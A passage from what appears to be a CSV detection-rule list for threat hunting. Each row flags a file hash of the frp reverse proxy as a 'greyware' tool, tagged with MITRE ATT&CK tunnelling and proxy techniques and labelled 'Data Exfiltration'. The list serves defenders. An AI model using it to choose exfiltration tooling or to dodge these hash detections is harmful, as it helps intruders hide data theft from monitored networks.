TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*987f353f6ea282e259738eeb90c20b70fe20e1a49aca498b02acc47200c082bd*",".{0,1000}987f353f6ea282e259738eeb90c20b70fe20e1a49aca498b02acc47200c082bd.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*98ab35f179091726b739c9fbb6643cc7328076bfbddd09732bb68b1cdf1b7435*",".{0,1000}98ab35f179091726b739c9fbb6643cc7328076bfbddd09732bb68b1cdf1b7435.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*99196195845422f6ac5962782fa3676f34fff343e0fed0f354cb6600d894afd8*",".{0,1000}99196195845422f6ac5962782fa3676f34fff343e0fed0f354cb6600d894afd8.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*9a12912bfbf7dad0ebe5fb3b0229b318a8670d078137f2384f81c1aa87bc0fb0*",".{0,1000}9a12912bfbf7dad0ebe5fb3b0229b318a8670d078137f2384f81c1aa87bc0fb0.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*9a56f4e3bf3a276c7be0b2f180a4d6ffbad1258dc09fe2d6637666dee9c840f6*",".{0,1000}9a56f4e3bf3a276c7be0b2f180a4d6ffbad1258dc09fe2d6637666dee9c840f6.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*9aab5a4936295d13f2602c8e087fd789a7910b3b3c9a47b9fb799ec99020192b*",".{0,1000}9aab5a4936295d13f2602c8e087fd789a7910b3b3c9a47b9fb799ec99020192b.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*9b3e4c64089c3b78ea1f666f11551e4ae6a435fc0797e39ab4fb07fd633b400c*",".{0,1000}9b3e4c64089c3b78ea1f666f11551e4ae6a435fc0797e39ab4fb07fd633b400c.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*9bc9e19e782030fdd219ef29607658de9b197adc9427cbc4517cb9884b7e7c07*",".{0,1000}9bc9e19e782030fdd219ef29607658de9b197adc9427cbc4517cb9884b7e7c07.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*9f27cec3b7e600c0223c0de06b65feafa9ed6bf82a8b1dfe338aef6b03bac097*",".{0,1000}9f27cec3b7e600c0223c0de06b65feafa9ed6bf82a8b1dfe338aef6b03bac097.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*a003f5539bcf1c36e9d8f0565857dc8478015da4f97fa64bcb91f6495bbfc105*",".{0,1000}a003f5539bcf1c36e9d8f0565857dc8478015da4f97fa64bcb91f6495bbfc105.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*a094d80528b9c413de86e56ff9e8617ff6b8855e8e95bc9c1826dea339033eba*",".{0,1000}a094d80528b9c413de86e56ff9e8617ff6b8855e8e95bc9c1826dea339033eba.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*a148f12a5261ef3186322b08cf1b1907d987505ec5485adb290a350bb2083f63*",".{0,1000}a148f12a5261ef3186322b08cf1b1907d987505ec5485adb290a350bb2083f63.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*a249c503a622599ba68330f323de22a457e058157cb8e38cd3e59581993c03d2*",".{0,1000}a249c503a622599ba68330f323de22a457e058157cb8e38cd3e59581993c03d2.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*a2a4ca5c8cbd085efefb71b5ff652d12425d6b16cdd3f22426c0a6f32d109942*",".{0,1000}a2a4ca5c8cbd085efefb71b5ff652d12425d6b16cdd3f22426c0a6f32d109942.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*a343c8f23ba35c943e1c9311df17eb12f84c682d2ba0e965e244a49759b65f28*",".{0,1000}a343c8f23ba35c943e1c9311df17eb12f84c682d2ba0e965e244a49759b65f28.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*a3f01a59bca7cb330bf680019595bbbf5f8167494fab4c46eaaf836fdc3a1902*",".{0,1000}a3f01a59bca7cb330bf680019595bbbf5f8167494fab4c46eaaf836fdc3a1902.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*a41466714ba9463978139a62d241893a034425235b61ecf2efd868857e1c83b5*",".{0,1000}a41466714ba9463978139a62d241893a034425235b61ecf2efd868857e1c83b5.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*a41b7612e1057aff1743cdd0c9cf2dddd07f7e4e0340d419f05c42612b118a02*",".{0,1000}a41b7612e1057aff1743cdd0c9cf2dddd07f7e4e0340d419f05c42612b118a02.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*a4623a06a0787afdbebf56aa1f406229d7457beb36c316e67ea90346e6921bb6*",".{0,1000}a4623a06a0787afdbebf56aa1f406229d7457beb36c316e67ea90346e6921bb6.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*a47d75d634790109eaa5768d4e5cb504988e3754dcfe458072ef0b46d9aea419*",".{0,1000}a47d75d634790109eaa5768d4e5cb504988e3754dcfe458072ef0b46d9aea419.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*a4c1317ecb23efbf995cdf4b05c514fcd005d08ea50284e7c5b50f2ae312d88d*",".{0,1000}a4c1317ecb23efbf995cdf4b05c514fcd005d08ea50284e7c5b50f2ae312d88d.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*a4e37ca2c83f78a36945b82a7779749ecbf9661e9e6e4e881ab6d41666e1f669*",".{0,1000}a4e37ca2c83f78a36945b82a7779749ecbf9661e9e6e4e881ab6d41666e1f669.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*a5496a0364e4e071aa6a1cbcfd519e35ac8dcb4eac9a24e6a22340c4d4cf1914*",".{0,1000}a5496a0364e4e071aa6a1cbcfd519e35ac8dcb4eac9a24e6a22340c4d4cf1914.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*a5656349a6b98aba519b6222ad470fdb2a95903ae5ebf0b90819c441cd8dba8b*",".{0,1000}a5656349a6b98aba519b6222ad470fdb2a95903ae5ebf0b90819c441cd8dba8b.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*a660a94c158cb280974447efd174d3525d806ac7235f6546abeb1a57660a1125*",".{0,1000}a660a94c158cb280974447efd174d3525d806ac7235f6546abeb1a57660a1125.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*a7626329b690c269d640555033e156a55cffb967f11556eb782ff130d0ad7982*",".{0,1000}a7626329b690c269d640555033e156a55cffb967f11556eb782ff130d0ad7982.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*a77d3fa9419c5dc12ebd94eb5b97be3cff2c12b00dbe3884adc9ffcedf73909e*",".{0,1000}a77d3fa9419c5dc12ebd94eb5b97be3cff2c12b00dbe3884adc9ffcedf73909e.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*a792cd515589050d475a28b714276a2960ed7ef8e0e5baeea3d38301a775fbb4*",".{0,1000}a792cd515589050d475a28b714276a2960ed7ef8e0e5baeea3d38301a775fbb4.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*acd9f040fc6fb2a595f20bfb4faa66d9244615a0feaf9d2e4b03a994ca126a32*",".{0,1000}acd9f040fc6fb2a595f20bfb4faa66d9244615a0feaf9d2e4b03a994ca126a32.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*ad151125bd46fb8abf11f2a4347c7c85e102bb0e6128c69962c8d6bf9a71fca6*",".{0,1000}ad151125bd46fb8abf11f2a4347c7c85e102bb0e6128c69962c8d6bf9a71fca6.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*ad61f4285ae98dd4b8bad622888e97bb290e2ca667cd9ad52ad2877cc2ec6807*",".{0,1000}ad61f4285ae98dd4b8bad622888e97bb290e2ca667cd9ad52ad2877cc2ec6807.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*ad977caa79c00c082206f46f521b8f99a44a051425dbb69ec9da1a152aac6279*",".{0,1000}ad977caa79c00c082206f46f521b8f99a44a051425dbb69ec9da1a152aac6279.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*adbfe65938517a8024565569825526643eac2d3294f4524d12a2846611107e08*",".{0,1000}adbfe65938517a8024565569825526643eac2d3294f4524d12a2846611107e08.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*aff5412e89e7164b5083909f2b5a81d8edaa644a3bb6ef696843a6ee0d129fc3*",".{0,1000}aff5412e89e7164b5083909f2b5a81d8edaa644a3bb6ef696843a6ee0d129fc3.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*b09684adfae58733bc12cd0ee3cf1e20d6b888c3e5280cf9f9e7a6467cf87a71*",".{0,1000}b09684adfae58733bc12cd0ee3cf1e20d6b888c3e5280cf9f9e7a6467cf87a71.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*b09d38e5eba230a6bb04f144f5d32d26ce69f1424bbbb1058d43c712ff558679*",".{0,1000}b09d38e5eba230a6bb04f144f5d32d26ce69f1424bbbb1058d43c712ff558679.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*b117ea60954ad0c8d4e92eb60ca8e748806978506c377d59b4f5bc5295c4e3d1*",".{0,1000}b117ea60954ad0c8d4e92eb60ca8e748806978506c377d59b4f5bc5295c4e3d1.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*b18153bc7a6d6627f402380a6e5ac01b631207df54d7fcc0d89a8f6f81521401*",".{0,1000}b18153bc7a6d6627f402380a6e5ac01b631207df54d7fcc0d89a8f6f81521401.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*b1c9ee1dff229639c43c60e39a6023798b5c96ccd38df7e3edd41cfb6990c90a*",".{0,1000}b1c9ee1dff229639c43c60e39a6023798b5c96ccd38df7e3edd41cfb6990c90a.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*b1dc5923bfb2c9d0d1e271e20cce3615f8d23d276e376d9c566dc5400f14282d*",".{0,1000}b1dc5923bfb2c9d0d1e271e20cce3615f8d23d276e376d9c566dc5400f14282d.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*b2768608b33e964fc7067657f385ba15a69762b0a875db47981953d70dd36af7*",".{0,1000}b2768608b33e964fc7067657f385ba15a69762b0a875db47981953d70dd36af7.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*b2cb915a6e66c99fcceceae07b08d28002c575a3bc2c6aa8ea88c9ae45294be3*",".{0,1000}b2cb915a6e66c99fcceceae07b08d28002c575a3bc2c6aa8ea88c9ae45294be3.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*b330c29f6ef91302c6a2b9a0f6e86c77b498d0babb60fe182440f1b97e0554cb*",".{0,1000}b330c29f6ef91302c6a2b9a0f6e86c77b498d0babb60fe182440f1b97e0554cb.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*b430c31a107a7c5e48899e3ee800f39aa50300d3d76f87bb7afb7ede58875cfe*",".{0,1000}b430c31a107a7c5e48899e3ee800f39aa50300d3d76f87bb7afb7ede58875cfe.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*b48943e9641fde4b91e0032fa031599fdbe3f9cebdd8612cec9e3477aecf2866*",".{0,1000}b48943e9641fde4b91e0032fa031599fdbe3f9cebdd8612cec9e3477aecf2866.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*b4a40bfaca19d5b8570be95ea2839fa82c7814c561510c3e3807ce273ee7c7cf*",".{0,1000}b4a40bfaca19d5b8570be95ea2839fa82c7814c561510c3e3807ce273ee7c7cf.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*b509e7d50b164aaa62b30efb189caf965615ce266d51c243e494bca14d2f2864*",".{0,1000}b509e7d50b164aaa62b30efb189caf965615ce266d51c243e494bca14d2f2864.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*b53e3cba1a8a3ebaa1e7d04f647eee3aed3417740692e346dc460c813403475c*",".{0,1000}b53e3cba1a8a3ebaa1e7d04f647eee3aed3417740692e346dc460c813403475c.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*b64b34521d1942f05b9224bb21d025af5c0ae99fa2e2dff635f26f91d91a6188*",".{0,1000}b64b34521d1942f05b9224bb21d025af5c0ae99fa2e2dff635f26f91d91a6188.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*b68640e6866a22639186095138657c53b0bb6626ec0438b488d1a2ffdde23155*",".{0,1000}b68640e6866a22639186095138657c53b0bb6626ec0438b488d1a2ffdde23155.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*b7a7814aedd230b66e11f3626aa505a2a701d6afc19bc8be2143955bfa3c1d6e*",".{0,1000}b7a7814aedd230b66e11f3626aa505a2a701d6afc19bc8be2143955bfa3c1d6e.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*b7f2414b1d8be99157e5b25ea578938520c45d094534fffb2e515796559b9b29*",".{0,1000}b7f2414b1d8be99157e5b25ea578938520c45d094534fffb2e515796559b9b29.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*b83a269ce5fb9ff099695165a5d3565646f6032579c4bc6925c63fe8100aee0f*",".{0,1000}b83a269ce5fb9ff099695165a5d3565646f6032579c4bc6925c63fe8100aee0f.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*b8a048ff117640b07633cd2cb357b07ab64fd1817f6f68f9926c555b293d2a69*",".{0,1000}b8a048ff117640b07633cd2cb357b07ab64fd1817f6f68f9926c555b293d2a69.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*b8a22f70d3451a7f4b8e1718da28ef02dfb38d37193bcbdc1df39eb52d0da40b*",".{0,1000}b8a22f70d3451a7f4b8e1718da28ef02dfb38d37193bcbdc1df39eb52d0da40b.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*b993db8bf609419a850d3233f97bf422de7e5e54576120c36de0ad703e541bf2*",".{0,1000}b993db8bf609419a850d3233f97bf422de7e5e54576120c36de0ad703e541bf2.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
